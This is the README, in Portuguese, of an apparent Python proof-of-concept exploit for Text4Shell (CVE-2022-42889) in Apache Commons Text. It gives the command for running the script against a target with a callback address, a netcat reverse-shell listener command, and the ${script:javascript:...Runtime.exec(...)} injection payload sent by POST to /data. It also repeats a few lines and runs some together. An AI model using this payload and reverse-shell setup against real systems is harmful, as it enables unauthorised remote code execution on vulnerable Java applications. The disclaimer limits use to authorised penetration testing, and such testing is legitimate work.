
Um exploit de prova de conceito (PoC) personalizado baseado em Python visando o Text4Shell (CVE-2022-42889), uma vulnerabilidade crítica de execução remota de código nas versões do Apache Commons Text < 1.10.
Um exploit de prova de conceito (PoC) personalizado em Python direcionado ao Text4Shell (CVE-2022-42889), uma vulnerabilidade crítica de execução remota de código no Apache Commons Text versões < 1.10.
Este exploit tem como alvo aplicações Java vulneráveis que utilizam a classe StringSubstitutor com interpolação ativada, permitindo a injeção de expressões ${script:...} para executar comandos arbitrários no sistema.
Neste PoC, a exploração é demonstrada através do parâmetro de consulta data; no entanto, o nome do parâmetro vulnerável pode variar dependendo da implementação. Os utilizadores devem adaptar o payload e o caminho da requisição de acordo com a lógica da aplicação alvo.
Aviso Legal: Este exploit é fornecido apenas para fins educacionais e de teste de penetração autorizado. Use com responsabilidade e por sua própria conta e risco.
Este é um exploit personalizado em Python3 para a vulnerabilidade do Apache Commons Text conhecida como Text4Shell (CVE-2022-42889). Ele permite Execução Remota de Código (RCE) através de interpoladores inseguros quando a entrada do usuário é avaliada dinamicamente por StringSubstitutor.
Testado contra:
${script:...} a partir de entrada não confiávelpython3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
O script injeta:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
O reverse shell é enviado através do parâmetro /data usando uma requisição POST.